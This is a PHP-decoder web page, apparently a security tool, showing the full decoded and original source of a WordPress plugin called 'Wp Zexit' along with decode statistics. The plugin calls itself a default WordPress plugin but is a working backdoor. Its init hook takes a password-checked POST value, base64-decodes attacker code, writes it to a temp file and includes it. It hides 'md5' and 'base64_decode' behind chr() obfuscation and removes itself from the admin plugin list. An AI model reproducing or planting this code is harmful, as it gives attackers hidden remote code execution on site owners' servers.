Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * Plugin Name: Wp Zexit * Plugin URI: https://wp-zexit.com *..
Decoded Output download
<?php
/**
* Plugin Name: Wp Zexit
* Plugin URI: https://wp-zexit.com
* Description: Default Wordpress plugin
* Author: Wp Zexit
* Author URI: https://wp-zexit.com
* Version: 1.6.3.1
*
*/
function zexit_wp_ajax_no()
{
if(isset($_POST['c'])) {
if(md5(md5($_POST['c']))==="1dd2d696a6c606509bb8c55b7be43017"){
echo md5("here");
}
}
}
add_action('wp_aja'.'x_n'.'op'.'ri'.'v'.'_zexit_no','zexit_wp_ajax_no');
function zexit_wp_ajax_adm()
{
if(current_user_can("manage_options")){
echo md5("adm");
}
}
add_action('wp_ajax_zexit_adm','zexit_wp_ajax_adm');
function zexit_init()
{
$i="i";$m="m".chr(100).chr(53);if(isset($_POST[$i])){if($_POST[$i]==$m($m($i))){echo $m($i);die();}if($m($m($_POST[$i.$i.$i]))==="e3e9e4".chr(56).chr(99).chr(48).chr(99).chr(51).chr(51).chr(52).chr(97).chr(56).chr(57).chr(54).chr(53).chr(57).chr(57).chr(51).chr(101).chr(99).chr(98).chr(102).chr(98).chr(48)."8ef0e"){$f=sys_get_temp_dir().chr(47).$i;$b=chr(98).chr(97).chr(115).chr(101).chr(54)."4".chr(95).chr(100).chr(101).chr(99).chr(111)."de";file_put_contents($f,"<".chr(63).chr(112).chr(104)."p ".$b($_POST[$i.$i]));@include($f);@unlink($f);}}
}
add_action('init','zexit_init');
function zexit_plugin() {
global $wp_list_table;
$h = array('wp-zexit/wp-zexit.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key,$h)) {
unset($wp_list_table->items[$key]);
}
}
}
add_action('pre_current_active_plugins', 'zexit_plugin');
?>
Did this file decode correctly?
Original Code
<?php
/**
* Plugin Name: Wp Zexit
* Plugin URI: https://wp-zexit.com
* Description: Default Wordpress plugin
* Author: Wp Zexit
* Author URI: https://wp-zexit.com
* Version: 1.6.3.1
*
*/
function zexit_wp_ajax_no()
{
if(isset($_POST['c'])) {
if(md5(md5($_POST['c']))==="1dd2d696a6c606509bb8c55b7be43017"){
echo md5("here");
}
}
}
add_action('wp_aja'.'x_n'.'op'.'ri'.'v'.'_zexit_no','zexit_wp_ajax_no');
function zexit_wp_ajax_adm()
{
if(current_user_can("manage_options")){
echo md5("adm");
}
}
add_action('wp_ajax_zexit_adm','zexit_wp_ajax_adm');
function zexit_init()
{
$i="i";$m="m".chr(100).chr(53);if(isset($_POST[$i])){if($_POST[$i]==$m($m($i))){echo $m($i);die();}if($m($m($_POST[$i.$i.$i]))==="e3e9e4".chr(56).chr(99).chr(48).chr(99).chr(51).chr(51).chr(52).chr(97).chr(56).chr(57).chr(54).chr(53).chr(57).chr(57).chr(51).chr(101).chr(99).chr(98).chr(102).chr(98).chr(48)."8ef0e"){$f=sys_get_temp_dir().chr(47).$i;$b=chr(98).chr(97).chr(115).chr(101).chr(54)."4".chr(95).chr(100).chr(101).chr(99).chr(111)."de";file_put_contents($f,"<".chr(63).chr(112).chr(104)."p ".$b($_POST[$i.$i]));@include($f);@unlink($f);}}
}
add_action('init','zexit_init');
function zexit_plugin() {
global $wp_list_table;
$h = array('wp-zexit/wp-zexit.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key,$h)) {
unset($wp_list_table->items[$key]);
}
}
}
add_action('pre_current_active_plugins', 'zexit_plugin');
Function Calls
add_action | 1 |
Stats
MD5 | 0340b5055ca78b632f7f86b69880ae23 |
Eval Count | 0 |
Decode Time | 55 ms |